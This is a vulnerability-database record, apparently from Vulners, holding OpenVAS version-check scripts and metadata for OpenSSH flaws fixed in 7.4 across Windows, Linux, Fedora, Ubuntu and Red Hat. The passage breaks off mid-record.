ID OPENVAS:1361412562310810325 Type openvas Reporter Copyright (C) 2017 Greenbone Networks GmbH Modified 2019-05-21T00:00:00
Description
This host is installed with openssh and
is prone to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
#
# OpenSSH Multiple Vulnerabilities Jan17 (Windows)
#
# Authors:
# Tushar Khelge <ktushar@secpod.com>
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:openbsd:openssh";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.810325");
script_version("2019-05-21T12:48:06+0000");
script_cve_id("CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10708");
script_bugtraq_id(94968, 94972, 94977, 94975);
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2019-05-21 12:48:06 +0000 (Tue, 21 May 2019)");
script_tag(name:"creation_date", value:"2017-01-06 10:55:34 +0530 (Fri, 06 Jan 2017)");
script_name("OpenSSH Multiple Vulnerabilities Jan17 (Windows)");
script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
script_category(ACT_GATHER_INFO);
script_family("General");
script_dependencies("gb_openssh_consolidation.nasl", "os_detection.nasl");
script_mandatory_keys("openssh/detected", "Host/runs_windows");
script_xref(name:"URL", value:"https://www.openssh.com/txt/release-7.4");
script_xref(name:"URL", value:"http://www.openwall.com/lists/oss-security/2016/12/19/2");
script_xref(name:"URL", value:"http://blog.swiecki.net/2018/01/fuzzing-tcp-servers.html");
script_xref(name:"URL", value:"https://anongit.mindrot.org/openssh.git/commit/?id=28652bca29046f62c7045e933e6b931de1d16737");
script_tag(name:"summary", value:"This host is installed with openssh and
is prone to multiple vulnerabilities.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"Multiple flaws exists due to,
- An 'authfile.c' script does not properly consider the effects of realloc
on buffer contents.
- The shared memory manager (associated with pre-authentication compression)
does not ensure that a bounds check is enforced by all compilers.
- The sshd in OpenSSH creates forwarded Unix-domain sockets as root, when
privilege separation is not used.
- An untrusted search path vulnerability in ssh-agent.c in ssh-agent.
- NULL pointer dereference error due to an out-of-sequence NEWKEYS message.");
script_tag(name:"impact", value:"Successfully exploiting this issue allows
local users to obtain sensitive private-key information, to gain privileges,
conduct a senial-of-service condition and allows remote attackers to execute
arbitrary local PKCS#11 modules.");
script_tag(name:"affected", value:"OpenSSH versions before 7.4 on Windows.");
script_tag(name:"solution", value:"Upgrade to OpenSSH version 7.4 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_banner");
exit(0);
}
include("version_func.inc");
include("host_details.inc");
if(isnull(port = get_app_port(cpe:CPE)))
exit(0);
if(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))
exit(0);
vers = infos["version"];
path = infos["location"];
if(version_is_less(version:vers, test_version:"7.4")) {
report = report_fixed_ver(installed_version:vers, fixed_version:"7.4", install_path:path);
security_message(port:port, data:report);
exit(0);
}
exit(99);
{"id": "OPENVAS:1361412562310810325", "type": "openvas", "bulletinFamily": "scanner", "title": "OpenSSH Multiple Vulnerabilities Jan17 (Windows)", "description": "This host is installed with openssh and\n is prone to multiple vulnerabilities.", "published": "2017-01-06T00:00:00", "modified": "2019-05-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810325", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://anongit.mindrot.org/openssh.git/commit/?id=28652bca29046f62c7045e933e6b931de1d16737", "http://blog.swiecki.net/2018/01/fuzzing-tcp-servers.html", "https://www.openssh.com/txt/release-7.4", "http://www.openwall.com/lists/oss-security/2016/12/19/2"], "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "lastseen": "2019-05-29T18:33:55", "viewCount": 91, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310871873", "OPENVAS:1361412562311220181254", "OPENVAS:1361412562311220171054", "OPENVAS:1361412562310891257", "OPENVAS:1361412562311220181068", "OPENVAS:13614125623108103256", "OPENVAS:1361412562311220171055", "OPENVAS:1361412562310872239", "OPENVAS:1361412562310843425", "OPENVAS:1361412562310891500"]}, {"type": "archlinux", "idList": ["ASA-201612-20"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-0264-1.NASL", "OPENSUSE-2017-184.NASL", "REDHAT-RHSA-2017-2029.NASL", "CENTOS_RHSA-2017-2029.NASL", "SLACKWARE_SSA_2016-358-02.NASL", "ORACLELINUX_ELSA-2017-2029.NASL", "OPENSSH_74.NASL", "PHOTONOS_PHSA-2017-0001_OPENSSH.NASL", "UBUNTU_USN-3538-1.NASL", "JUNIPER_SPACE_JSA10880.NASL"]}, {"type": "symantec", "idList": ["SMNTC-1397", "SMNTC-1469"]}, {"type": "slackware", "idList": ["SSA-2016-358-02"]}, {"type": "cve", "idList": ["CVE-2016-10010", "CVE-2016-10708", "CVE-2016-10012", "CVE-2016-10011", "CVE-2016-10009"]}, {"type": "f5", "idList": ["F5:K32485746", "F5:K31440025", "F5:K24324390", "F5:K62201745", "F5:K64292204"]}, {"type": "ubuntu", "idList": ["USN-3809-1", "USN-3538-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:9760638505AB3E758B4030C32D579480", "CFOUNDRY:AD75AE1BC6EAF1FB6EA7CEC33AAA7C78"]}, {"type": "fedora", "idList": ["FEDORA:D8A2B60A94E1"]}, {"type": "seebug", "idList": ["SSV:92580", "SSV:92581", "SSV:92582", "SSV:92579"]}, {"type": "centos", "idList": ["CESA-2017:2029"]}, {"type": "redhat", "idList": ["RHSA-2017:2029"]}, {"type": "aix", "idList": ["OPENSSH_ADVISORY10.ASC"]}, {"type": "amazon", "idList": ["ALAS-2017-898"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2029"]}, {"type": "freebsd", "idList": ["2C948527-D823-11E6-9171-14DAE9D210B8", "2AEDD15F-CA8B-11E6-A9A5-B499BAEBFEAF"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1500-1:E6BD7", "DEBIAN:DLA-1257-1:E0ED4"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2128-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-26577", "1337DAY-ID-26576"]}, {"type": "myhack58", "idList": ["MYHACK58:62201682311"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140261"]}, {"type": "exploitdb", "idList": ["EDB-ID:40962"]}], "modified": "2019-05-29T18:33:55", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2019-05-29T18:33:55", "rev": 2}, "vulnersScore": 8.2}, "pluginID": "1361412562310810325", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSH Multiple Vulnerabilities Jan17 (Windows)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openbsd:openssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810325\");\n script_version(\"2019-05-21T12:48:06+0000\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\");\n script_bugtraq_id(94968, 94972, 94977, 94975);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 12:48:06 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 10:55:34 +0530 (Fri, 06 Jan 2017)\");\n script_name(\"OpenSSH Multiple Vulnerabilities Jan17 (Windows)\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_openssh_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"openssh/detected\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.openssh.com/txt/release-7.4\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/12/19/2\");\n script_xref(name:\"URL\", value:\"http://blog.swiecki.net/2018/01/fuzzing-tcp-servers.html\");\n script_xref(name:\"URL\", value:\"https://anongit.mindrot.org/openssh.git/commit/?id=28652bca29046f62c7045e933e6b931de1d16737\");\n\n script_tag(name:\"summary\", value:\"This host is installed with openssh and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An 'authfile.c' script does not properly consider the effects of realloc\n on buffer contents.\n\n - The shared memory manager (associated with pre-authentication compression)\n does not ensure that a bounds check is enforced by all compilers.\n\n - The sshd in OpenSSH creates forwarded Unix-domain sockets as root, when\n privilege separation is not used.\n\n - An untrusted search path vulnerability in ssh-agent.c in ssh-agent.\n\n - NULL pointer dereference error due to an out-of-sequence NEWKEYS message.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows\n local users to obtain sensitive private-key information, to gain privileges,\n conduct a senial-of-service condition and allows remote attackers to execute\n arbitrary local PKCS#11 modules.\");\n\n script_tag(name:\"affected\", value:\"OpenSSH versions before 7.4 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenSSH version 7.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"7.4\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"7.4\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);", "naslFamily": "General"}
{"openvas": [{"lastseen": "2019-05-29T18:33:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "description": "This host is installed with openssh and\n is prone to multiple vulnerabilities.", "modified": "2019-05-21T00:00:00", "published": "2017-01-06T00:00:00", "id": "OPENVAS:13614125623108103256", "href": "http://plugins.openvas.org/nasl.php?oid=13614125623108103256", "type": "openvas", "title": "OpenSSH Multiple Vulnerabilities Jan17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSH Multiple Vulnerabilities Jan17 (Linux)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openbsd:openssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.8103256\");\n script_version(\"2019-05-21T12:48:06+0000\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\");\n script_bugtraq_id(94968, 94972, 94977, 94975);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 12:48:06 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 11:19:51 +0530 (Fri, 06 Jan 2017)\");\n script_name(\"OpenSSH Multiple Vulnerabilities Jan17 (Linux)\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_openssh_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"openssh/detected\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.openssh.com/txt/release-7.4\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/12/19/2\");\n script_xref(name:\"URL\", value:\"http://blog.swiecki.net/2018/01/fuzzing-tcp-servers.html\");\n script_xref(name:\"URL\", value:\"https://anongit.mindrot.org/openssh.git/commit/?id=28652bca29046f62c7045e933e6b931de1d16737\");\n\n script_tag(name:\"summary\", value:\"This host is installed with openssh and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An 'authfile.c' script does not properly consider the effects of realloc\n on buffer contents.\n\n - The shared memory manager (associated with pre-authentication compression)\n does not ensure that a bounds check is enforced by all compilers.\n\n - The sshd in OpenSSH creates forwarded Unix-domain sockets as root, when\n privilege separation is not used.\n\n - An untrusted search path vulnerability in ssh-agent.c in ssh-agent.\n\n - NULL pointer dereference error due to an out-of-sequence NEWKEYS message.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows\n local users to obtain sensitive private-key information, to gain privileges,\n conduct a senial-of-service condition and allows remote attackers to execute\n arbitrary local PKCS#11 modules.\");\n\n script_tag(name:\"affected\", value:\"OpenSSH versions before 7.4 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenSSH version 7.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"7.4\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"7.4\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-01-10T00:00:00", "id": "OPENVAS:1361412562310872239", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872239", "type": "openvas", "title": "Fedora Update for openssh FEDORA-2017-4767e2991d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssh FEDORA-2017-4767e2991d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872239\");\n script_version(\"$Revision: 14225 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 15:32:03 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-10 05:52:19 +0100 (Tue, 10 Jan 2017)\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for openssh FEDORA-2017-4767e2991d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"openssh on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-4767e2991d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UZROAYXZFIPMUCBTOK53F2RN4FDXSYEP\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.4p1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2017-15906", "CVE-2016-10012"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-01-23T00:00:00", "id": "OPENVAS:1361412562310843425", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843425", "type": "openvas", "title": "Ubuntu Update for openssh USN-3538-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3538_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for openssh USN-3538-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843425\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-23 07:38:02 +0100 (Tue, 23 Jan 2018)\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\",\n \"CVE-2017-15906\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for openssh USN-3538-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that OpenSSH\n incorrectly loaded PKCS#11 modules from untrusted directories. A remote attacker\n could possibly use this issue to execute arbitrary PKCS#11 modules. This issue\n only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-10009) Jann Horn\n discovered that OpenSSH incorrectly handled permissions on Unix-domain sockets\n when privilege separation is disabled. A local attacker could possibly use this\n issue to gain privileges. This issue only affected Ubuntu 16.04 LTS.\n (CVE-2016-10010) Jann Horn discovered that OpenSSH incorrectly handled certain\n buffer memory operations. A local attacker could possibly use this issue to\n obtain sensitive information. This issue only affected Ubuntu 14.04 LTS and\n Ubuntu 16.04 LTS. (CVE-2016-10011) Guido Vranken discovered that OpenSSH\n incorrectly handled certain shared memory manager operations. A local attacker\n could possibly use issue to gain privileges. This issue only affected Ubuntu\n 14.04 LTS and Ubuntu 16.04 LTS. This issue only affected Ubuntu 14.04 LTS and\n Ubuntu 16.04 LTS. (CVE-2016-10012) Michal Zalewski discovered that OpenSSH\n incorrectly prevented write operations in readonly mode. A remote attacker could\n possibly use this issue to create zero-length files, leading to a denial of\n service. (CVE-2017-15906)\");\n script_tag(name:\"affected\", value:\"openssh on Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3538-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3538-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.6p1-2ubuntu2.10\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:7.5p1-10ubuntu0.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:7.2p2-4ubuntu2.4\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-08-04T00:00:00", "id": "OPENVAS:1361412562310871873", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871873", "type": "openvas", "title": "RedHat Update for openssh RHSA-2017:2029-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2029-01_openssh.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for openssh RHSA-2017:2029-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871873\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:29 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-6210\",\n \"CVE-2016-6515\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for openssh RHSA-2017:2029-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is an SSH protocol implementation\n supported by a number of Linux, UNIX, and similar operating systems. It includes\n the core files necessary for both the OpenSSH client and server. The following\n packages have been upgraded to a later upstream version: openssh (7.4p1).\n (BZ#1341754) Security Fix(es): * A covert timing channel flaw was found in the\n way OpenSSH handled authentication of non-existent users. A remote\n unauthenticated attacker could possibly use this flaw to determine valid user\n names by measuring the timing of server responses. (CVE-2016-6210) * It was\n found that OpenSSH did not limit password lengths for password authentication. A\n remote unauthenticated attacker could use this flaw to temporarily trigger high\n CPU consumption in sshd by sending long passwords. (CVE-2016-6515) * It was\n found that ssh-agent could load PKCS#11 modules from arbitrary paths. An\n attacker having control of the forwarded agent-socket on the server, and the\n ability to write to the filesystem of the client host, could use this flaw to\n execute arbitrary code with the privileges of the user running ssh-agent.\n (CVE-2016-10009) * It was found that the host private key material could\n possibly leak to the privilege-separated child processes via re-allocated\n memory. An attacker able to compromise the privilege-separated process could\n therefore obtain the leaked key information. (CVE-2016-10011) * It was found\n that the boundary checks in the code implementing support for pre-authentication\n compression could have been optimized out by certain compilers. An attacker able\n to compromise the privilege-separated process could possibly use this flaw for\n further attacks against the privileged monitor process. (CVE-2016-10012)\n Additional Changes: For detailed information on changes in this release, see the\n Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\");\n script_tag(name:\"affected\", value:\"openssh on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2029-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00013.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", 